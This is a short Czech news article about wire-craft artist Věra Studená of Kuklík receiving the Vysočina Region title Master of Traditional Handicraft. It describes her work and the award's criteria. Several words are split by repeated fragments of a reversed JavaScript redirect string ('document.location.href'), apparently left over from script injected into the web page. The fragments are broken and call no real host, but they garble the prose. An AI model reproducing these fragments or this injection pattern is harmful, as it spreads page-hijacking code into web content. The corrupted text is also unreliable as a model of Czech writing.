Rainbow page separator

Mistryně rukodělné výroby z Kuklíku převzala ocenění

Pondělí, 14. června 2021

Kuklík / Prestižní ocenění Mistr tradiční rukodělné výroby Kraje Vysočina převzala z rukou krajského radního pro oblast kultury Romana Fabeše drátenice Věra Studená z Kuklíku. Ocenění a titul získala za umění práce s drátem, kterému se věnuje od roku 2004. Je také lek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torkou i propagá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torkou drátenictví a její umění proniklo až do Francie, kde vedla kurzy základů drá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování v oblasti Provence.
Věra Studená se s drátenictvím seznámila prostřednictvím odborné literatury a jako samouk si osvojila příslušné techniky. V její produkci jsou zas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupeny vedle drá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaných kraslic, šperků, figurálních artefaktů či klobouků i kameninové a skleněné nádoby, talíře či stínidla lamp. K práci používá železný a měděný drát, který kombinuje s korálky, sklem či kamenem. Do roku 2018 byla členkou cechu českomoravských uměleckých dráteníků, kde získala mistrovský titul. Spolupracuje se spolkem Dráteník, s jehož členy představuje svoji tvorbu na výstavách.
Titul Mistr tradiční rukodělné výroby Kraje Vysočina uděluje krajské zastupitelstvo od roku 2016, aktuálně je v seznamu čtrnáct jmen. Záměrem je ocenit lidi, kteří vynikají ve svém řemesle, ovládají postupy a technologii výroby, čímž pomáhají uchovávat tradice a předávají um dalším generacím. Titul může být ročně udělen nejvýše třem řemeslníkům.